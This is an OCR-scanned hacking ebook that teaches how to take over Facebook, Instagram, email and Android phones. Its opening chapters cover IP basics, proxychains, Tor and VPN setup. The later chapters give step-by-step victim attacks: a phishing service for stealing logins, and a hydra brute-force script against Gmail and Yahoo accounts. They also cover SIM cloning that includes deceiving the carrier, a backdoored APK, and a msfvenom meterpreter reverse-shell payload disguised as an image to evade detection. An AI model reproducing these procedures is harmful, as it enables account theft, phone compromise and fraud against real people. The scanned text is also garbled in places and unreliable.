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Social media hacking: hack any 
facebook, instagram, twitter, accounts 


Hello and welcome to this social media hacking in this book we will 
how to hack facebook, instagram, twitter and smartphones by sending 
an image with various methods. All this methods of hacking account 
and smartphone are just for educational purpose if you miss use this 
hacking skills then we are not responsible for this 
Chapters- 

(1)- Understanding the concept of ip 

(2)- Changing ip address 

(3) - Phishing attack 

(4)- Brute force attack 

(5) - SIM cloning 

(6)- Password resetting 

(7)- Creating trojan virus to hack android 
(8)- Binding virus in an image to hack android 


So these are the chapters we are going to read in this book. 


Understanding ip address 


| coe 





Q1- what is an ip? Type of ip. 


Internet protocol:- The Internet Protocol (IP) is the 

principal communications protocol in the Internet protocol suite for 
relaying datagrams across network boundaries. Its routing function 
enables internetworking, and essentially establishes the Internet. 

IP has the task of delivering packets from the source host to the 
destination host solely based on the IP addresses in the 

packet headers. For this purpose, IP defines packet structures 

that encapsulate the data to be delivered. It also defines addressing 
methods that are used to label the datagram with source and 
destination information. 


Types of ip 


There are four types of ip address 


° Local ip 

° Public ip 

° Dynamic ip 

° Static ip 

° Local ip - An external or public ip address is used 


across the entire Internet to locate computer systems and 
devices. A local or internal ip address is used inside a 
private network to locate the computers and devices 
connected to it is known as local ip. 


e public IP address — a public ip address that can 
be accessed over the Internet. Like postal addresses to 
deliver a postal mail to your home, a public ip address the 
globally unique ip address assigned to a computing 
device. Your public ip address can be found at What is 
my ip Address page . 


Dynamic ip- A dynamic IP address is an IP address that's 
automatically assigned to each connectionof a network, like your 
smartphone, desktop PC, wireless tablet... whatever. 


This automatic assignment of IP addresses is done by what's called 
a DHCP server A DHCP server assigned IP address is called 
dynamic because it will often be different on future connections to 
the network. 


The "opposite" of a dynamic IP address is called a static IP 
address (one that was configured manually). 


Static ip - A static IP address is an IP address that was manually 
configured for a device, versus one that was assigned via 

a DHCP server. It's called static because it doesn't change. It's the 
exact opposite of a dynamic IP address, which change. Routers, 
phones, tablets, desktops, laptops, and any other device that can 


use an IP address can be configured to have a static IP address. 
This might be done through the device giving out IP addresses (like 
the router) or by manually typing the IP address into the device 
voice the device itself. 


Static IP addresses are also sometimes referred to as fixed ip 
address dedicated ip address. 


Why Would You Use a Static IP Address? 


Another way to think of a static IP address is to think of something 
like an email address, or a physical home address. These addresses 
don't ever change - they're static - and it makes contacting or finding 
someone very easy. 


Similarly, a static IP address is useful if you host a website from 
home, have a file server in your network, are using networked 
printers, are forwarding ports to a specific device, are running a print 
server, or if you use a remote access program. Because a static IP 
address never changes, other devices always know exactly how to 
contact a device that uses one. 


For example, say you set up a static IP address for one of the 
computers in your home network. Once the computer has a specific 
address tied to it, you can set up your router to always forward 
certain inbound requests directly to that computer, such as FTP 
requests if the computer shares files over FTP. 


Not using a static IP address (using a dynamic IP that does change) 
would become a hassle if you're hosting a website, for example, 
because with every new IP address that the computer gets, you'd 
have to change the router settings to forward requests to that new 
address. Neglecting to do this would mean nobody could get to your 
website because your router has no idea which device in your 
network is the one that's serving the website. 


Another example of a static IP address at work is with DNS servers. 
DNS servers use static IP addresses so that your device always 
knows how to connect to them. If they changed often, you'd have to 
regularly reconfigure those DNS servers on your router or 
computer to keep using the internet like you're used to. 


Static IP addresses are also useful for when the device's domain 
name is inaccessible. Computers that connect to a file server ina 
workplace's network, for instance, could be set up to always connect 
to the server using the server's static IP instead of its hostname. 
Even if the DNS server is malfunctioning, the computers could still 
access the file server because they'd be communicating with it 
directly through the IP address. 


With remote access applications like Windows Remote Desktop, 
using a Static IP address means you can always access that 
computer with the same address. Using an IP address that changes 
will, again, require you to always know what it changes to so that you 
can use that new address for the remote connection. 


Static vs Dynamic IP Addresses 


The opposite of a never-changing static IP address is an ever - 
changing dynamic IP address. A dynamic IP address is just a 
regular address like a static IP is, but it's not permanently tied to any 
particular device. Instead, they're used for a specific amount of time 
and then returned to an address pool so that other devices can use 
them. 


This is one reason that dynamic IP addresses are so useful. If an isp 
were to use static IP addresses for all of their customers, that would 
mean that there'd constantly be a limited supply of addresses for 
new customers. Dynamic addresses provide a way for IP addresses 
to be reused when they're not in use elsewhere, providing internet 
access for many more devices than what would otherwise be 
possible. 


Is Your Inbox Out of Control? 
Believe it or not, our free, daily newsletter can help you use tech 
better and declutter your inbox. Sign up now! 


Static IP addresses limit downtime. When dynamic addresses obtain 
a new IP address, any user that's connected to the existing one will 
be kicked off from the connection and have to wait to find the new 
address. This wouldn't be a wise setup to have if the server is 


hosting a website, a file sharing service, or an online video game, all 
of which normally require constantly active connections. 


The public IP address assigned to the routers of most home and 
business users is a dynamic IP address. Larger companies usually 
do not connect to the internet via dynamic IP addresses; instead, 
they have static IP addresses assigned to them which do not 
change. 


Disadvantages of Using a Static IP Address 


The major disadvantage that static IP addresses have over dynamic 
addresses is that you have to configure the devices manually. The 
examples given above with regards to a home web server and 
remote access programs require you not only to set up the device 
with an IP address but also to properly configure the router to 
communicate with that specific address. 


This definitely requires more work than just plugging in a router and 
allowing it to give out dynamic IP addresses via DHCP. 


What's more is that if you assign your device with an IP address of, 
say, 192.168.1.110, but then you go to a different network that only 
gives out 10.X.X.X addresses, you will not be able to connect with 
your static IP and will instead have to reconfigure your device to use 
DHCP (or pick a static IP that works with that new network). 


Security might be another downfall to using static IP addresses. An 
address that never changes gives hackers a prolonged time frame to 
find vulnerabilities in the device's network. The alternative would be 
using a dynamic IP address that changes and would, therefore, 
require the attacker to also change how it is communicating with the 
device. 


How to Set a Static IP Address in Windows 


The steps for configuring a static IP address in Windows are fairly 
similar in Windows 10through Windows XP. See this guide at How- 
To Geek for specific instructions in each version of Windows 


Some routers let you reserve an IP address for specific devices that 
are connected to your network. This is normally done through what's 
called DHCP reservation and it works by associating an IP address 
with a MAC address so that each time that specific device requests 
an IP address, the router assigns it the one you've chosen to have 
associated with that physical MAC address. 


You can read more about using DHCP Reservation at your router's 
manufacturer's website. Here are links to instructions on doing this 
on D-Link, Linksys, and NETGEARrouters. 


Fake a Static IP With a Dynamic DNS Service 


Using a static IP address for your home network is going to cost 
more than just getting a regular dynamic IP address. Instead of 
paying for a static address, you could use what's called a dynamic 
dns service. 


Dynamic DNS services let you associate your changing, dynamic IP 
address to a hostname that don’t change. It's a bit like having your 
own static IP address but at no extra cost than what you're paying 
for your dynamic IP. 


No ip is one example of a free dynamic DNS service. You just 
download their DNS update client which always redirects the 
hostname you choose to be associated with your current IP address. 
This means if you have a dynamic IP address, you can still access 
your network using the same hostname. 


A dynamic DNS service is very helpful if you need to access your 
home network with a remote access program but don't want to pay 
for a static IP address. Similarly, you can host your own website from 
home and use dynamic DNS to ensure your visitors always have 
access to your website. 


ChangelP.com and DNSdynamic are two more free dynamic DNS 
services but there are many others. 


More Information on Static IP Addresses 


In a local network, like in your home or place of business, where you 
use a private IP address, most devices are probably configured for 
DHCP and thus use dynamic IP addresses. 
However, if DHCP is not enabled and you've configured your own 
network information, you're using a static IP address. 

Changing ip address 





Changing ip address- 


= changing the ip of an operating system is very important for 
hackers and for normal public also because the people should not be 
allowed to remain anonymously on the web. | don't like that site need 
to track how much hours i spend watching YouTube videos or how | 
do my online banking, especially with every company crumbling 
under the fingers of information 

So there are three methods of changing the ip address and be 
anonymous. 


(1) Proxy chain 
(2) Tor browser 
(3) Vpn (virtual private network) 


(1) Proxy chain 
Proxy chain is a tool allow you to chain multi proxy 
to connect to each other and then wrep your 
program of choice the connect to the Internet this 
masks your ip with many layers and can be a good 
tool when you are trying to be anonymous by the 
help of proxy chain we can select any country ip 
address by our choice. 


Steps to change ip with proxy chain tools. 
Step1- first download the proxy chain tool by 
typing the urn in url box 
u=proxychains.sourceforge.net/&hl=en- 
IN&tg=161 or directly type on google download 
proxy chain too googleweblight you will get. 


Step2- And install this tool and open terminal 


Step3- type command sudotor -zxvf <package 
name> 


Now change the directories and configure 


Step4- Type cd <proxychain directory>&& 
./configure 


Step5- then type sudo make 


Step6- Install the proxy chain command 
Sudo make install 


Now this time to watch a video go to youtube.com 
and type proxy chain configuration select the video 
with same title and watch it. 


Commands 
1. Nano proxychain.conf 
2. Add proxies to the confirmation files 
3. Proxy chain curl -s 


https://checkips.dyndns.org 
To run Firefox through it, run. 
Proxy chainFirefox — That will wrap around Firefox 


connection and run it through the chain if you ip 
address has changed congratulations! 


Tor browser - 


= Tor browser is a software protect you by bouncing you 
communication around a distribution network of relays run by 
volunteer all around the world. This software is available in every 
platform like android,iso, Windows and Linux and many more and by 
the help of this software we can make our self more anonymous. All 
the attack of hacking are performed by kali Linux so we need to learn 
how to install the tor browser in kali linux. Just follow the given steps 
to install in kali linux os 


Step1- open the browser of you kali Linux os 

Step2- go to google.com and type tor browser for kali Linux and 
download from its official website but remember download the 
application according to your os bit. 

Step3- now your file is in zip format the extract it 

step4- Open that folder and there you will see a text file name start 
tor browser open that and type ctrl +f to find so type root on the file 
search box. 

Step5- There you will see a script written as “id-u “ -eq=0 so just edit 
the text just change 0 into 1 and save it. 

step6- Now cut every folder and go to desktop and open a terminal 
and type cd desktop if your tor browser file is in the desktop otherwise 
go to that folder where your tor browser installation file is and type 
command cd the tor browser file installation name. 

Step/- You will enter on that file directory so just need to type cd that 
copy the open tor browser file name and past into the terminal after 
writing cd and press enter installation will start automatically. 


Browse the Internet without any tension about tracking because the 
tor browser change you ip after some time so it is very difficult to find 
your current location. 

Vpn (virtual private network ) 


- Vpn standards for virtual private network it is a secure 
tunnel between two or more devices .vpn are used to 


protect private web traffic from snooping interference. 
A vpn available from the public Internet can provide 
some of the benefits of wide area network. So today 
we will learn how to use vpn in kali Linux and more 
secure and safe. 


Steps to connect the open vpn settings 


Step1- go to desktop and open a terminal and type all this commands 
Sudo apt-get install network. 

Manager-openvpn network-manager 

Network-manager-gnome network 

Manager-openvpn-gnome 


After typing all this command all the settings will open to connect the 
vpn. Then update the network manager config file.open in vim just 
type command. 
Vi/etc/networkmanagement/networkmanager.conf 


Press i and install a mode. Then arrow down to the line that says. 
[Main] 

Plugins=ifupdown, keyfile 

[Ifupdown] 

Managed=true 

After then reboot you pc and after rebooting go to desktop and open 
terminal and type these commands 

= Mkdir -/openvpn. 

Then Cd into that directory. 

= Cd -/openvpn 

Then run this command 

Then download from given link the file will be in zip format the extract 
it. 


Open Settings, then go to Network. Once in network: 
1. click + at the bottom left to add a new connection. 


2. Choose VPN. 


3. Click import from file. 
4. Go to the openvpn folder we made earlier. 


5. Double click on the connection you want, (us-east, mexico, 
toronto, etc) 


6. Remove :1198 from the end of the gateway field, should 
just end with .com 


7. Putin your PIA username and password 

8. Click Advanced 

9. Check Use custom gateway port and set it to 1198 
10. Click the security tab at the top 


11. Scroll down until you see AES-1286-CBC and check that 
one, do not use the lower case aes-128-cbc if you see it. 


12. Change the HMAC Authentication to SHA-1 
13. Click OK 
14. Click Apply 


15. Choose your new VPN from that list and click the On/Off 
switch and watch it connect. 


Phishing attack 


facebook 
PHISHING 
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Q 1- what is phishing attack? = phishing attack is a type of social 
engendering in which the hacker make a fake page like real one and 
send to victim and ask to log in when the victim log in into it. The hack 
get the id number and password of user this attack can be perform in 
any type of account which needs id and password to log in. Generally 
this attack is performed for facebook hacking. But nowadays 
facebooks blocking the phishing link by this phishing attack is bit 
controlled. 


Q2 How to hack fb by using phishing attack. 

To hack Facebooks by phishing attack just follow the given steps 
bellow. 

(1) open you browser 

(2) go to google.com and search shadowaves 

(3) Select the top of the result and open that site 

(4) first create your account and log in 

(5) at the home page you will see two options (1) samers1 (2) 
scammers select the second option (scamers2) 

(6) copy the link and send to your victims in massage or in a Zip file 
because if we send it directly facebook will block that link and your id 
also. 

(7) And ask to log in when he or she log in into it you will get the 
number and password 














( | Simple) 





Brute force attack 


Brute Force 


Attack 





To hack facebook account by using brute force attack just follow the 
given steps. 


Step 1 — getting ready 


To perform this attack you need to download a script of Faitagram 
just open the terminal and type cd desktop and press enter the type 
enter file will download on your desktop. 

License is just a MIT license, Readme has informations about the 
script on it, faitagram is the main source, setup.py is for the 
installing dependencies, and wiistis a wordlist so lets chrom the file 
SO we Can access it. 


Step 2- After downloading the file go to the faitagram directory by 
just typing cd Faitagram after entering in the folder type 
“chmod +x faitagram && chmod +x setup.py” 


We did that’ to install all the requirements to run the script by typing 
a command 
“python setup.py” 


It will install all the packages that to start a brute force attack you 
just need to wait for some times after completing the installation you 
no need to download the world list because The faitagram file 
contains a strong password list, so don't worry about the wordlists. 
But still if you want to test it out, than use your own wordlist. 


The format is: “python faitagram -s service -u username -w wordlist - 
d delay” 


Now all things are ready and you can start bruteforce attack for 
facebook just type — 

“python faitagram -s facebook -u (email) -w (wordlist) -d (delay)” 
The (email) section, is for the email of your target. 
The (wordlist) section is for the path to the wordlist. 
And the (delay) is for the delays(seconds). 
Delay is optional, just don't type the "-d" if you don't want to use it. 
But, the others are a must. 
And if you don’t have a world list and you want to select the defolt 
wordlist then just type "wlist" instead of the (wordlist). 
Some times in FaceBook, it will ask you to enter the name of the 
target. 
It is just to prevent errors, and for Username Checking. 


Example — “python -s facebook -u MEMEBIGBOY -w 
/root/password.txt” 


Wait it can take some times depending upon your target password 
strength 


Email hacking with bruteforce 


As we know that email is required everywhere and if we hack the 
email of the victim then we can do any thing what every we want so 
today we are going to learn how to hack email anonymously by the 
help of brute force attack just follow the given steps so you can also 
perform this attack very easily. 


So now we will be focusing on brute forcing email, or more 
specifically, SMTP, also known as the Simple Mail Transfer Protocol. 
It is your standard protocol for sending electronic mail to the 
peoples. 


Requirments- updated kali linux operating system 
Good fast internet connection 
Your system ip should be chanded and use good vpn. 


Step1- Let's open Leafpad, or your text editing program of your 
choice 


(Untitled) 
i rch Options Help 


File Edit Sea 











Untitled 


We are going to write a little bit of script, so that we can save some 
time instead of going through the hassle of actually typing out 
parameters. 


On Leafpad, type: 


#! /bin/bash 


echo Simple Email Cracking Script in bash 

echo Written By: Alan Cao 

echo NOTE: Make sure you have wordlists! 

echo Let us Begin: 

echo Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / 
Hotmail = smtp.live.com /: 

read smtp 

echo Enter Email Address: 

read email 

echo Provide Directory of Wordlist for Passwords: 
read wordlist 


hydra -S -| $email -P $wordlist -e ns -V -s 465 $smtp smtp 


And after doing this all just, save itas anything you want, but with .sh at the end. Make 
sure it is in the root directory. Not on your desktop, but in /root. ( must important) 


Applications Places ¢ | Sun Jun 14, 1:58 PM 





File Edit Search Options H — —— — — 








#! /bin/bash aie eratcracif 
echo Simple Email Cracq Saveinfolder: | < || €jroot Create Folder 
echo Written By: Alan 
echo NOTE: Make sure y 
echo Let us Begin: Places Name v Size Modified 
echo Choose a SMTP ser ~~ Wl Downtozas USTSI/ZUIS 
read smtp pee fii hacks 06/02/2015 | 
echo Enter Email Addrg Recently Used ~ 
read email @ Loic 05/31/2015 
echo Provide Directory fwiroot | fi rext 06/03/2015 
read wordlist i Desktop 

fi skedula Wednesday 11 


Now, | am going to explain how the script works. 


#! /bin/bash simply means that everything is in bash. 


echo simply means to tell the computer to say something. 

read is asking for user input. this will then store your input into a variable. read email would 
mean for you to enter something, and it will be stored into the email. 

hydra -S -| $email -P $wordlist -e ns -V -s 465 $smtp smtp is the THC Hydra command 
which will help brute-force the email address. As you may tell, there are some parameters 
with a $. This is the variable with stored values you previously input in the read command. 


Step3- permission 


The file you have saved (in root, right?) only has read and write permissions. This means 
you cannot execute it. So just follow this step to execute 


open up Terminal. Type in 
chmod a+x yourscript.sh (ofc replace yourscript with the name you actually gave to the 
bash file) 


root@kali: ~ 


File Edit View Search Terminal Help 


root@kali:~# chmod a+x emailcrack.sh 
root@kali:~# fj 





Step4- Execute! 
Now we can finally use it! 


In terminal,type 
./yourscript.sh 





root@kali: ~ 


File Edit View Search Terminal Help 
lroot@kali:~# chmod a+x emailcrack.sh 
jroot@kali:~# ./emailcrack.sh 
Simple Email Cracking Script in bash 
Written By: Alan Cao 
NOTE: Make sure you have wordlists! 
|Let us Begin: 

Choose a SMIP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / Ho 
tmail = smtp.Live.com /: 


It's working! 


The script is self-explanatory. Type in the SMTP service of the target's email, where 
smtp.gmail.com is Gmail. After that, you just provide the gmail account,example 


johndoe@gmail.com and give a wordlist directory, which you can find some default ones in 
the /usr/share/wordlists directory, or you can create your own with Crunch or CUPP. It is 
better to create a own wordlist but basically it is depend on your victim. 


Sim cloning 





Q1- what is sim cloning ? 
- sim cloning is the method by that we can clone sim 


card after cloning the the calls, messages will come on 
both the sims same we can do same work both the 
clone sims but there are the some terms and 


conditions to clone a sim 
1- | wecannot clone any sim card there are 3 types 


of sim in market based on three algoritham 
COMP128v1, COMP128v2 and COMP128v3 it is 
very imoprtent to note that only version comp128v1 
sim card can clone but 70 % of the sim card we 
use are in comp128v1 sim card. 


Things required to clone a sim 


Blank Programmable SIM Card: | got this one from Amazon, you can 
also buy one from alibaba 


A SIM Firmware Reader/Writer: | also got this on Amazon, but it’s 
available on alibaba 


Download and install: MagicSIM 





Download and install: USB SIM Card Reader 


Access to the victim’s SIM for about 15 to 20 minutes ?? 


Steps to clone a sim. 


Step1- remove the sim from the phone that you want to clone and 
instert into sim card reader click read from the card in magic SIM. 


Select crack sim in toolbar when it show “connected” 


Step2- Click strong KI and select all of the other find options and then 
Click start. 


Once your KI is found and the crack is finished, click the file, save the 
file info into a folder 


Step3- You must click disconnect from the file menu or you will ruin 
your SIM card[Important, Otherwise SIM will crack] 


Step4- Once it says disconnected. Remove the SIM card and Put the 
SIM in your phone and see if it still works, it should. (/f not, either you 
did not unlock your SIM card, or you tried to copy it instead of crack 
and save retry again) 


Unlock SIM Card 


GO TO PHONE TOOLS AND SELECT SIM CARD, THEN SELECT 
UNLOCK SIM, IT WILL PROMPT FOR A CODE. 


CALL NETWORK PROVIDER, THEY WILL ASK FOR YOUR 
PHONE NUMBER, YOUR ACCOUNT INFO, NAME, AND 
SECURITY CODE, THEN THEY WILL ASK WHY YOU WANT TO 
UNLOCK YOUR SIM CARD, JUST TELL THEM YOU NEED TO 
UNLOCK YOUR SIM TO GET IT TO WORK WITH YOUR 
OVERSEAS PHONE OR SOMETHING THEY WILL DO. ONECE 
THEY GIVE YOU SIM UNLOCK CODE ENTER IT, IT WILL SAY SIM 
IS UNLOCKED 


STEP5- INSERT THE BLANK SIM CARD AND OPEN USB SIM 
Card Reader Software not magic SIM at this time. 


Step6- click on the connect it will say no information is formed if it is 
truly blank sim card 


Step 7: Select the write to SIM, it will prompt you to select a .dat file, 
select the one you saved earlier. 


Step 8: Now click on the start, it will take about 10 minutes to write it, 
once it is complete, it will ask for a security code, enter the security 
code the network provider gave you, then click Finish sim will cloned. 


DONE: You have successfully cloned a SIM Card. 


Resetting password 






PASSVVORD 


RESET 


now you had cloned the sim card so now you can easily rest the 
password but now we will learn how to access the victim phone 
without touching his or her phone by just sending an image. 


Creating virus to hack android . 
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° Creating a virus and hacking android is the basic 
to android hacking so today we will learn how to create a 
virus and hack android so before creating virus change 
your ip and use vpn to download any file. There are many 
methods to hack android like creating Trojan 
viruses,payload and many more so today we will learn to 
create a payload and injecting into an application just 
follow the given steps or watch a YouTube video just type 
on the youtube url box backdoreapk android hacking 
binding payload with an application select the top results 
and watch it. 


Steps:- 
Step1- go to desktop and open your browser 


Step2- download any android application less then 10 mb to 
bind paylaod in apk. 


Step3- Now go to google.com and type backdore.apk git hub 
and open the top result. 

Step4- Copy the link of that application by clicking on clone 
and download 

Step5- Go to desktop and type command cd desktop to 
change the directory on desktop 

Step6- Type git clone and past the link that you had copied 
and press enter that app will download in your desktop 
Example to write command- git clone 
https://github.com/dana.at.cp/backdore.apk.get 


Step6- Open that folder and there you will see a folder 

name backdore.apk open that folder 

Step7- Copy your Android apk and past into backdore.apk file. 
Step8- Now cut that folder and go to desktop and open a new 
terminal. 

Step9- Type cd Desktop type to enter in the desktop and open 
a new terminal. 

step10- Type Is to see all the files in the current directory. 


Step11- Then type cd backdore.apk and press enter. 


Step12- Then you will enter on backdore.apk folder directory 
type Is and press enter. 


Step13- Then type cd backdore.apk and press enter then type 
is to see the file of the backdore.apk 


Step14- Type command chmod +x backdore.apk.sh and 
press enter 


Step15- Type ./backdore-apk.sh then type your Android apk 
file name and press enter. 
Step16- Type 3 (meterpreter/reverce_tcp) it will ask you Ihost 


Step17- Open a new terminal and type ipconfig to see your ip 
copy it. 

Step18- past your ip to the Ihost and press enter and 
remember that you ip should be static to perform this attack in 
(wan) 

Step19- now it will ask your port no type your port number but 
your port should be forwarded then only it work if you don’t 
know how to port forward don’t worry just go to YouTube and 
type how to port forward of router just watch any video and 
forward your port no. 


Step20- Now you will see lots of option but you just type 2 and 
press enter. 


Step21- Open the backdore apk file and and go to backdore 
file again and open terminal through it. 


Step22- Type service apachez2 start 

Step23- Then type service postgresql start. 
Step24- Then type msfconsole 

Step25- Then type multi/handler 


Step26- Then type set payload android/meterpreter 
reverse_tcp 


Step27- set Ihost type your static ip 
Step28- set Iport port no which is forward 


Step29- exploit 


Send that apk file to your victims and ask to install when he 
will open that app you will get all the control of his phone after 
installing and opening the app 


Step30- type help to see what-what you can do. 


Bind virus into an image (Android hacking) 





We had learned all ready what is virus and how to bind virus with an 
android application but today we will learn how to bind virus into an 
image so by sending an image we can hack any android phone but 
we should have to send that image into a folder and folder should be 
zip just follow the given steps.- 


Step1- Go to desktop and a new terminal. 

Step2- Type a command= msfvenum -p 
android/meterpreter/reverce_tcp Lhost (type your static ip)Lport 
(your port number which is forwarded) -f exe -o /root/desktop/lol.exe 
Now your image is generated in desktop so copy that fine and past it 
into a windows operating system desktop page. 

Step3- Now bind the virus and image together but before binding 
make sure that your image revelation should be low 

Step4- select the both and click right button and go to add to archive 
Step5- Then rename the file name. 

Step6- Then go to compression mode and select best 

Step7- the go to advance settings the again go to setup settings and 
type the both file name. 

Step8- Then go to modes and select hide and then go to text and 
icon option and choice your file in sfx icon. 

Step9- Then select the overwrite of file option on overwrite mode. 
Step10- Then press ok on both the options your image will created 
on desktop then send it to your victims but your file should be in zip 
so the what's app cannot detect it. 


Step11- Now go to kali Linux desktop and open the terminal and 
where you left up type command multi/handler 

Step12- Then type set payload/meterpreter/reverce_tcp 

Step13- Then type set Ihost ( then your static ip) 

Step14- Then type lport (your port no which is forward) 

Step15- Type exploit 

When your victims open that image after extracting your will get the 
meterpreter then you can do every thing what ever you want just 
type help to see. 


